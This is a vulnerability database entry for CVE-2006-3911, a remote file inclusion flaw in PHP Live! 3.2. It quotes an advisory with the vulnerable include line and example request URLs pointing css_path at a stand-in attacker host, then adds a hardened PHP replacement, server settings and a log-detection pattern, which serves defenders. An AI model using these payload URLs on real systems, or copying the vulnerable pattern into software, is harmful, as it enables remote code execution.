PHP Live! 'help.php' and 'setup/header.php' css_path Remote File Inclusion Vulnerability

Vulnerability ID: 1110666    Vulnerability type: Input validation
Published: 2006-07-23    Updated: 2006-09-22
CVE: CVE-2006-3911    CNNVD ID: CNNVD-200607-466
Platform: PHP    CVSS score: 7.5
| Sources
https://www.exploit-db.com/exploits/2060
https://cxsecurity.com/issue/WLB-2006080006
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-466
| Details
PHP Live! is open-source software built on PHP and MySQL that provides real-time chat for enterprise users. PHP Live! does not properly filter input to the css_path parameter of the help.php and setup/header.php files, which allows remote attackers to execute arbitrary PHP code by including local and external resources. The vulnerable code is shown below:
| Exploit
Advisory: PHPLive 3.2 Remote Injection Vulnerability
 Release Date: 2006/07/23
       Author: magnific
   Discovered: aneurysm.inc security research
         Risk: High
Vendor Status: not contacted | no patch available
  Vendor Site: www.osicodes.com
      Contact: aneurysm_inc[at]hotmail[dot]com
      Version: all

-----------
Overview:

Some variables are not properly sanitized before being used.
Here you will find the variables not properly sanitized:

-----------
Vulnerable code:

help.php /setup/header.php etc..

<? $css_path = ( !isset( $css_path ) ) ? $css_path = "./" : $css_path ; include_once( $css_path."css/default.php" ) ; ?>

-----------
Execution:

help.php?css_path=htt://attacker
setup/header.php?css_path=htt://attacker


-----------
Vendor:

At the moment, there are no solutions from the vendor. If you want to make
sure the code and your PHPLIVE are safe, you have to sanitize the variable $css_path
in all affected files.
Activate SAFE_MODE on the server, for local security.

---------------------------
aneurysm.inc security research
irc.gigachat.net
#aneurysm.inc
---------------------------

# milw0rm.com [2006-07-23]
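The advisory above only says to "sanitize the variable $css_path". The following is an added example, written for this page and not code from the advisory author or from the PHP Live! project, that puts the vulnerable include pattern beside a hardened replacement. It assumes PHP 7 or later and an application layout with `css/default.php` and `setup/css/default.php` under the application root; the function and constant names are hypothetical.

```php
<?php
// Added example (not from the advisory or PHP Live!): the vulnerable include
// pattern beside a hardened replacement.

// --- Vulnerable pattern, as quoted in the advisory ---
// On PHP 4 / PHP 5.0-5.3 with register_globals=On, ?css_path=... populates
// $css_path before this code runs, so the isset() check is satisfied by request
// input and include_once() follows whatever prefix was supplied: a remote URL
// when allow_url_include (allow_url_fopen on older PHP) is on, or an arbitrary
// local path otherwise. Kept here for contrast only.
function vulnerable_css_include()
{
    global $css_path;
    $css_path = ( !isset( $css_path ) ) ? "./" : $css_path;
    include_once( $css_path . "css/default.php" );
}

// --- Hardened replacement ---
// 1. Never build an include path from request data. The caller may only choose
//    a short theme name that is looked up in a fixed allowlist.
// 2. Resolve the final path with realpath() and confirm it stays under the
//    application root, so '..' sequences and stream wrappers cannot escape.
const CSS_THEMES = [            // allowlist: theme name => directory under app root
    'default' => 'css',
    'setup'   => 'setup/css',
];

function safe_css_include(string $theme = 'default'): string
{
    if (!isset(CSS_THEMES[$theme])) {
        $theme = 'default';       // unknown name: fall back, never trust the input
    }
    $base = realpath(__DIR__);
    $file = realpath(__DIR__ . '/' . CSS_THEMES[$theme] . '/default.php');
    // realpath() returns false for a missing file; the prefix check rejects
    // anything resolved outside the application directory.
    if ($file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('CSS include outside application root refused');
    }
    include_once $file;
    return $file;
}

// Usage: read only a theme *name* from the request, never a path or URL.
$theme = isset($_GET['theme']) ? (string) $_GET['theme'] : 'default';
safe_css_include($theme);
```

Two server-side settings close the same class of bug independently of the application code: `register_globals = Off` (the default since PHP 4.2 and removed entirely in PHP 5.4) stops query parameters from becoming variables, and `allow_url_include = Off` (PHP 5.2 and later) stops `include`/`require` from fetching remote URLs. For detection, web-server access logs with `css_path=` followed by `://` or `..` against `help.php` or `setup/header.php` are the direct indicator of exploitation attempts against this issue.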
| References

Source: BID
Name: 19116
Link: http://www.securityfocus.com/bid/19116
Source: BUGTRAQ
Name: 20060724 PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities
Link: http://www.securityfocus.com/archive/1/440955
Source: OSVDB
Name: 27449
Link: http://www.osvdb.org/27449
Source: OSVDB
Name: 27448
Link: http://www.osvdb.org/27448
Source: MILW0RM
Name: 2060
Link: http://www.milw0rm.com/exploits/2060
Source: VUPEN
Name: ADV-2006-2940
Link: http://www.frsirt.com/english/advisories/2006/2940
Source: SECTRACK
Name: 1016581
Link: http://securitytracker.com/id?1016581
Source: XF
Name: phplive-help-setupheader-file-include(27914)
Link: http://xforce.iss.net/xforce/xfdb/27914
Source: BUGTRAQ
Name: 20061007 PHP Live! <= 3.1 help.php Remote File Inclusion vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/447947/100/200/threaded
Source: MISC
Link: http://www.neosecurityteam.net/index.php?action=advisories&id=25
Source: SECTRACK
Name: 1017017
Link: http://securitytracker.com/id?1017017
Source: SREASON
Name: 1297
Link: http://securityreason.com/securityalert/1297
Source: SECUNIA
Name: 21158
Link: http://secunia.com/advisories/21158